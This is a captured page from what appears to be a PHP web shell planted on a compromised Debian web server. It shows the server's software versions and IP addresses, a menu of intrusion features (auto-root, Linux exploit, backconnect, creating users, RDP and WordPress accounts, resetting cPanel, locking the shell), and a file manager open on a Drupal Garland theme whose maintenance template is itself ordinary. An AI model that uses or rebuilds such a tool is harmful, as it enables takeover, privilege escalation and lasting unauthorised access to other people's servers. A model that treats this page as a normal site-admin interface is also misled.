Linux polon 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64
Apache/2.4.59 (Debian)
: 10.2.73.233 | : 3.133.153.110
Cant Read [ /etc/named.conf ]
5.6.40-64+0~20230107.71+debian10~1.gbp673146
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
baltic /
web /
themes /
garland /
[ HOME SHELL ]
Name
Size
Permission
Action
color
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
comment.tpl.php
814
B
-rw-r--r--
fix-ie-rtl.css
1.13
KB
-rw-r--r--
fix-ie.css
1.29
KB
-rw-r--r--
garland.info
409
B
-rw-r--r--
logo.png
5
KB
-rw-r--r--
maintenance-page.tpl.php
2.68
KB
-rw-r--r--
node.tpl.php
992
B
-rw-r--r--
page.tpl.php
2.85
KB
-rw-r--r--
print.css
1.02
KB
-rw-r--r--
screenshot.png
10.69
KB
-rw-r--r--
style-rtl.css
4.85
KB
-rw-r--r--
style.css
20.3
KB
-rw-r--r--
template.php
4.35
KB
-rw-r--r--
theme-settings.php
753
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : maintenance-page.tpl.php
<?php /** * @file * Override of the default maintenance page. * * This is an override of the default maintenance page. Used for Garland and * Minnelli, this file should not be moved or modified since the installation * and update pages depend on this file. * * This mirrors closely page.tpl.php for Garland in order to share the same * styles. */ ?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="<?php print $language->language ?>" lang="<?php print $language->language ?>" dir="<?php print $language->dir ?>"> <head> <title><?php print $head_title ?></title> <?php print $head ?> <?php print $styles ?> <?php print $scripts ?> </head> <body class="<?php print $classes ?>"> <!-- Layout --> <div id="header-region" class="clearfix"><?php print $header; ?></div> <div id="wrapper"> <div id="container" class="clearfix"> <div id="header"> <div id="logo-floater"> <?php // Prepare header $site_fields = array(); if ($site_name) { $site_fields[] = $site_name; } if ($site_slogan) { $site_fields[] = $site_slogan; } $site_title = implode(' ', $site_fields); if ($site_fields) { $site_fields[0] = '<span>' . $site_fields[0] . '</span>'; } $site_html = implode(' ', $site_fields); if ($logo || $site_title) { print '<h1 id="branding"><a href="' . $base_path . '" title="' . $site_title . '">'; if ($logo) { print '<img src="' . $logo . '" alt="' . $site_title . '" id="logo" />'; } print $site_html . '</a></h1>'; } ?> </div> </div> <!-- /header --> <?php if ($sidebar_first): ?> <div id="sidebar-first" class="sidebar"> <?php print $sidebar_first ?> </div> <?php endif; ?> <div id="center"><div id="squeeze"><div class="right-corner"><div class="left-corner"> <?php if ($title): ?><h2><?php print $title ?></h2><?php endif; ?> <?php print $messages; ?> <?php print $help; ?> <div class="clearfix"> <?php print $content ?> </div> <div id="footer"><?php print $footer ?></div> </div></div></div></div> <!-- /.left-corner, /.right-corner, /#squeeze, /#center --> <?php if ($sidebar_second): ?> <div id="sidebar-second" class="sidebar"> <?php print $sidebar_second ?> </div> <?php endif; ?> </div> <!-- /container --> </div> <!-- /layout --> </body> </html>
Close